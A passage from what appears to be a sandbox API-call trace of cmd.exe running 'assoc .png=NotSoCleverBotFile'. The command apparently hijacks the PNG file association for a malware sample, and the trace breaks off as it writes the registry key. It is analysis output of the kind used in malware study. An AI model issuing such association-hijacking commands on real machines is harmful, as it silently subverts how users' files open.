start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1691 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1692 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1693 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1694 start_va = 0x980000 end_va = 0xb00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 1695 start_va = 0x4d60000 end_va = 0x615ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d60000" filename = "" Region: id = 1696 start_va = 0x6160000 end_va = 0x655afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006160000" filename = "" Region: id = 1697 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1698 start_va = 0x71ee0000 end_va = 0x71f54fff monitored = 0 entry_point = 0x71f19a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1699 start_va = 0x560000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1700 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1701 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1702 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1703 start_va = 0x74ad0000 end_va = 0x74bbafff monitored = 0 entry_point = 0x74b0d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1704 start_va = 0xb10000 end_va = 0xba0fff monitored = 0 entry_point = 0xb48cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Thread: id = 141 os_tid = 0xf38 [0257.069] GetModuleHandleA (lpModuleName=0x0) returned 0xd00000 [0257.069] __set_app_type (_Type=0x1) [0257.070] __p__fmode () returned 0x74ac4d6c [0257.070] __p__commode () returned 0x74ac5b1c [0257.070] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd15200) returned 0x0 [0257.070] __getmainargs (in: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0, _DoWildCard=0, _StartInfo=0xd260fc | out: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0) returned 0 [0257.071] GetCurrentThreadId () returned 0xf38 [0257.071] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf38) returned 0x84 [0257.071] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0257.071] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadUILanguage") returned 0x74f72510 [0257.071] SetThreadUILanguage (LangId=0x0) returned 0x409 [0257.078] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0257.078] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0257.078] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0257.078] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0257.078] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0257.078] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0257.078] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0257.078] GetConsoleOutputCP () returned 0x1b5 [0257.079] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0257.079] SetConsoleCtrlHandler (HandlerRoutine=0xd20e40, Add=1) returned 1 [0257.079] _get_osfhandle (_FileHandle=1) returned 0x3c [0257.079] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0257.080] _get_osfhandle (_FileHandle=1) returned 0x3c [0257.080] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0257.080] _get_osfhandle (_FileHandle=1) returned 0x3c [0257.080] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0257.080] _get_osfhandle (_FileHandle=0) returned 0x38 [0257.080] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0257.080] _get_osfhandle (_FileHandle=0) returned 0x38 [0257.080] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0257.081] GetEnvironmentStringsW () returned 0x5f7cf8* [0257.081] GetProcessHeap () returned 0x5f0000 [0257.081] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa1a) returned 0x5f8720 [0257.081] FreeEnvironmentStringsA (penv="A") returned 1 [0257.081] GetProcessHeap () returned 0x5f0000 [0257.081] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x4) returned 0x5f0550 [0257.081] GetEnvironmentStringsW () returned 0x5f7cf8* [0257.081] GetProcessHeap () returned 0x5f0000 [0257.081] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa1a) returned 0x5f9148 [0257.081] FreeEnvironmentStringsA (penv="A") returned 1 [0257.081] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0257.082] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0257.082] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0257.082] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0257.082] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0257.082] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0257.082] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0257.082] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0257.082] RegCloseKey (hKey=0x94) returned 0x0 [0257.082] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0257.082] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0257.082] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0257.082] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0257.082] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0257.083] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0257.083] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0257.083] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0257.083] RegCloseKey (hKey=0x94) returned 0x0 [0257.083] time (in: timer=0x0 | out: timer=0x0) returned 0x620b751d [0257.083] srand (_Seed=0x620b751d) [0257.083] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C assoc .png=NotSoCleverBotFile" [0257.083] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C assoc .png=NotSoCleverBotFile" [0257.083] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0257.083] GetProcessHeap () returned 0x5f0000 [0257.083] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x210) returned 0x5f9b70 [0257.083] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5f9b78, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0257.083] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0257.083] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0257.083] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0257.083] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0257.084] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0257.084] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0257.084] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0257.084] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0257.084] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0257.084] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0257.084] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0257.084] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0257.084] GetProcessHeap () returned 0x5f0000 [0257.084] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5f8720) returned 1 [0257.085] GetEnvironmentStringsW () returned 0x5f7cf8* [0257.085] GetProcessHeap () returned 0x5f0000 [0257.085] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa32) returned 0x5fa7c8 [0257.085] FreeEnvironmentStringsA (penv="A") returned 1 [0257.085] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0257.085] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0257.085] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0257.085] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0257.085] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0257.085] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0257.085] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0257.085] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0257.085] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0257.085] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0257.085] GetProcessHeap () returned 0x5f0000 [0257.085] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x44) returned 0x5f05c8 [0257.085] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0257.086] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0257.086] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0257.086] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5f0618 [0257.086] FindClose (in: hFindFile=0x5f0618 | out: hFindFile=0x5f0618) returned 1 [0257.086] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x5f0618 [0257.086] FindClose (in: hFindFile=0x5f0618 | out: hFindFile=0x5f0618) returned 1 [0257.087] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0257.087] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5f0618 [0257.087] FindClose (in: hFindFile=0x5f0618 | out: hFindFile=0x5f0618) returned 1 [0257.087] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0257.087] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0257.087] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0257.087] GetProcessHeap () returned 0x5f0000 [0257.088] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5fa7c8) returned 1 [0257.088] GetEnvironmentStringsW () returned 0x5f7cf8* [0257.088] GetProcessHeap () returned 0x5f0000 [0257.088] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa76) returned 0x5f9d88 [0257.088] FreeEnvironmentStringsA (penv="=") returned 1 [0257.088] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0257.088] GetProcessHeap () returned 0x5f0000 [0257.088] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5f05c8) returned 1 [0257.088] GetProcessHeap () returned 0x5f0000 [0257.088] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x400e) returned 0x5fbc88 [0257.089] GetProcessHeap () returned 0x5f0000 [0257.089] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x48) returned 0x5fa808 [0257.089] GetProcessHeap () returned 0x5f0000 [0257.089] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5fbc88) returned 1 [0257.089] GetConsoleOutputCP () returned 0x1b5 [0257.090] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0257.090] GetUserDefaultLCID () returned 0x409 [0257.090] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xd334a0, cchData=8 | out: lpLCData=":") returned 2 [0257.090] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0257.090] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0257.090] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0257.090] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xd334b0, cchData=8 | out: lpLCData="/") returned 2 [0257.090] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xd33500, cchData=32 | out: lpLCData="Mon") returned 4 [0257.090] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xd33540, cchData=32 | out: lpLCData="Tue") returned 4 [0257.090] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xd33580, cchData=32 | out: lpLCData="Wed") returned 4 [0257.090] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xd335c0, cchData=32 | out: lpLCData="Thu") returned 4 [0257.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xd33600, cchData=32 | out: lpLCData="Fri") returned 4 [0257.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xd33640, cchData=32 | out: lpLCData="Sat") returned 4 [0257.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xd33680, cchData=32 | out: lpLCData="Sun") returned 4 [0257.091] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xd334c0, cchData=8 | out: lpLCData=".") returned 2 [0257.091] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xd334e0, cchData=8 | out: lpLCData=",") returned 2 [0257.091] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0257.092] GetProcessHeap () returned 0x5f0000 [0257.092] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20c) returned 0x5fa8a0 [0257.092] GetConsoleTitleW (in: lpConsoleTitle=0x5fa8a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0257.093] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0257.093] GetProcAddress (hModule=0x74f30000, lpProcName="CopyFileExW") returned 0x74f4ffc0 [0257.093] GetProcAddress (hModule=0x74f30000, lpProcName="IsDebuggerPresent") returned 0x74f4b0b0 [0257.093] GetProcAddress (hModule=0x74f30000, lpProcName="SetConsoleInputExeNameW") returned 0x76beb440 [0257.093] GetProcessHeap () returned 0x5f0000 [0257.093] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x400a) returned 0x5fbc88 [0257.093] GetProcessHeap () returned 0x5f0000 [0257.094] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5fbc88) returned 1 [0257.094] _wcsicmp (_String1="assoc", _String2=")") returned 56 [0257.094] _wcsicmp (_String1="FOR", _String2="assoc") returned 5 [0257.094] _wcsicmp (_String1="FOR/?", _String2="assoc") returned 5 [0257.094] _wcsicmp (_String1="IF", _String2="assoc") returned 8 [0257.094] _wcsicmp (_String1="IF/?", _String2="assoc") returned 8 [0257.094] _wcsicmp (_String1="REM", _String2="assoc") returned 17 [0257.095] _wcsicmp (_String1="REM/?", _String2="assoc") returned 17 [0257.095] GetProcessHeap () returned 0x5f0000 [0257.095] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x58) returned 0x5faab8 [0257.095] GetProcessHeap () returned 0x5f0000 [0257.095] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x14) returned 0x5f74c0 [0257.096] GetProcessHeap () returned 0x5f0000 [0257.096] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x3a) returned 0x5fab18 [0257.097] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0257.099] _wcsicmp (_String1="assoc", _String2="DIR") returned -3 [0257.099] _wcsicmp (_String1="assoc", _String2="ERASE") returned -4 [0257.099] _wcsicmp (_String1="assoc", _String2="DEL") returned -3 [0257.099] _wcsicmp (_String1="assoc", _String2="TYPE") returned -19 [0257.099] _wcsicmp (_String1="assoc", _String2="COPY") returned -2 [0257.099] _wcsicmp (_String1="assoc", _String2="CD") returned -2 [0257.099] _wcsicmp (_String1="assoc", _String2="CHDIR") returned -2 [0257.099] _wcsicmp (_String1="assoc", _String2="RENAME") returned -17 [0257.099] _wcsicmp (_String1="assoc", _String2="REN") returned -17 [0257.099] _wcsicmp (_String1="assoc", _String2="ECHO") returned -4 [0257.099] _wcsicmp (_String1="assoc", _String2="SET") returned -18 [0257.099] _wcsicmp (_String1="assoc", _String2="PAUSE") returned -15 [0257.099] _wcsicmp (_String1="assoc", _String2="DATE") returned -3 [0257.099] _wcsicmp (_String1="assoc", _String2="TIME") returned -19 [0257.099] _wcsicmp (_String1="assoc", _String2="PROMPT") returned -15 [0257.099] _wcsicmp (_String1="assoc", _String2="MD") returned -12 [0257.099] _wcsicmp (_String1="assoc", _String2="MKDIR") returned -12 [0257.099] _wcsicmp (_String1="assoc", _String2="RD") returned -17 [0257.099] _wcsicmp (_String1="assoc", _String2="RMDIR") returned -17 [0257.100] _wcsicmp (_String1="assoc", _String2="PATH") returned -15 [0257.100] _wcsicmp (_String1="assoc", _String2="GOTO") returned -6 [0257.100] _wcsicmp (_String1="assoc", _String2="SHIFT") returned -18 [0257.100] _wcsicmp (_String1="assoc", _String2="CLS") returned -2 [0257.100] _wcsicmp (_String1="assoc", _String2="CALL") returned -2 [0257.100] _wcsicmp (_String1="assoc", _String2="VERIFY") returned -21 [0257.100] _wcsicmp (_String1="assoc", _String2="VER") returned -21 [0257.100] _wcsicmp (_String1="assoc", _String2="VOL") returned -21 [0257.100] _wcsicmp (_String1="assoc", _String2="EXIT") returned -4 [0257.100] _wcsicmp (_String1="assoc", _String2="SETLOCAL") returned -18 [0257.100] _wcsicmp (_String1="assoc", _String2="ENDLOCAL") returned -4 [0257.100] _wcsicmp (_String1="assoc", _String2="TITLE") returned -19 [0257.100] _wcsicmp (_String1="assoc", _String2="START") returned -18 [0257.100] _wcsicmp (_String1="assoc", _String2="DPATH") returned -3 [0257.100] _wcsicmp (_String1="assoc", _String2="KEYS") returned -10 [0257.100] _wcsicmp (_String1="assoc", _String2="MOVE") returned -12 [0257.100] _wcsicmp (_String1="assoc", _String2="PUSHD") returned -15 [0257.100] _wcsicmp (_String1="assoc", _String2="POPD") returned -15 [0257.100] _wcsicmp (_String1="assoc", _String2="ASSOC") returned 0 [0257.100] GetProcessHeap () returned 0x5f0000 [0257.100] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x6c) returned 0x5fab60 [0257.103] GetProcessHeap () returned 0x5f0000 [0257.103] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5fab60, Size=0x3a) returned 0x5fab60 [0257.103] GetProcessHeap () returned 0x5f0000 [0257.103] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5fab60) returned 0x3a [0257.103] GetProcessHeap () returned 0x5f0000 [0257.103] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x46) returned 0x5faba8 [0257.103] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Classes", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19fa14 | out: phkResult=0x19fa14*=0xa0) returned 0x0 [0257.104] GetProcessHeap () returned 0x5f0000 [0257.104] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x6c) returned 0x5fabf8 [0257.107] GetProcessHeap () returned 0x5f0000 [0257.107] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5fabf8, Size=0x3e) returned 0x5fabf8 [0257.107] GetProcessHeap () returned 0x5f0000 [0257.107] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5fabf8) returned 0x3e [0257.107] GetProcessHeap () returned 0x5f0000 [0257.107] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x12) returned 0x5f76e0 [0257.107] GetProcessHeap () returned 0x5f0000 [0257.107] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x2e) returned 0x5fac40 [0257.107] RegCreateKeyExW (in: hKey=0xa0, lpSubKey=".png", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x19f9cc, lpdwDisposition=0x0 | out: phkResult=0x19f9cc*=0xa4, lpdwDisposition=0x0) returned 0x0 [0257.107] RegSetValueExW (in: 